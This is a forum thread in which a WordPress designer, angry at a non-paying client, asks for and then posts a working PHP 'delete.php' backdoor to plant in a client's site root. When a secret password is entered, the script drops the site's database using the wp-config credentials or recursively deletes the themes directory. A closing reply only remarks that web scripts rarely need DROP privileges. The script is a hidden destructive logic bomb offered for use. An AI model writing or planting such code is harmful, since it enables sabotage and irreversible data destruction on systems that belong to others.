[RESOLVED] PHP Script Delete Database

[acrow]

I have been doing a few wordpress websites for clients and I just got burned working on someones remote server. What I thought of was maybe a php script that would delete someones database if they didn't pay. just a simple form that I could input a code into that would destroy the database. The thing is my skills are at design only when it comes to php files. I am more of a .net guy.

Does anyone know of just a simple textbox submit form that I could enter a set code into that would kill the defined database? Maybe even a code I could enter that would delete the php file off the server in the event they made the payment

Thanks!

[acrow]

Ok as I stated above.. after being burned by a client that locked me out of their WordPress website after I completed a job... I wished I had a way to remove the work I had completed. I did a small amount of research and put together the following code... I am passing this on to everyone here incase they find the need for such a script...

It may not be perfect but it works!

#1) Save this file as delete.php in the root directory of the WordPress website.
#2) Change the DeleteDatabasePassword to your password
#3) Change the DeleteFilePassword to your password
#4) Set Desired Directory to Delete

Code:

<!-- Use at your own risk! Created for those sole purpose of protecting Wordpress Web Designers from non paying clients! -->
<?php include("wp-config.php"); ?>
<html>
<head>
</head>
<body>
<form action='delete.php' method='post'>
  Password:
  <input type='password' name='pass'>
  <input type='submit' value='Check'>
</form>
<?php
// lets start with PHP coding

// this variable is anyting you enter in password
$pass=$_POST['pass'];

// authenticate password

// Set DeleteDatabasePassword to the Desired Password Below
if (($pass=="DeleteDatabasePassword")) 
	{
		$conn = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
		if(! $conn )
		{
  			die('Could not connect: ' . mysql_error());
		}
		echo 'Connected successfully<br />';
		$sql = 'DROP DATABASE '.DB_NAME;
		$retval = mysql_query( $sql, $conn );
		if(! $retval )
		{
  			die('Could not delete database: ' . mysql_error());
		}
		mysql_close($conn);
		
		echo "Database Deleted!";
	}
// Set DeleteFilesPassword to the Desired Password Below
elseif (($pass=="DeleteFilesPassword"))
	{
		function recursiveDelete($dir, $removeRoot=false) {
    		$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir), RecursiveIteratorIterator::CHILD_FIRST);
			    foreach ($iterator as $path) {
        			if ($path->isDir()) {
            		rmdir($path->__toString());
        		} else {
            		unlink($path->__toString());
        		}
    	}

    if ($removeRoot) {
    	rmdir($dir);
    }
	}
	
// Set the name of the director you want to delete
	$dir = dirname(__FILE__).'/wp-content/themes/';
	// delete root dir in this example by setting second argument to true
	recursiveDelete($dir, false);

		echo "Files Deleted!";
	}
	
	else echo "Access Denied!";

	//close php
	?>
</body>
</html>

[penagate]

Interesting idea.
No comment on your particular situation, just a technical point I want to raise: in general, PHP scripts shouldn't be granted DROP privileges. Creating and deleting schemas should usually be done through a control panel or console totally separate from the web application.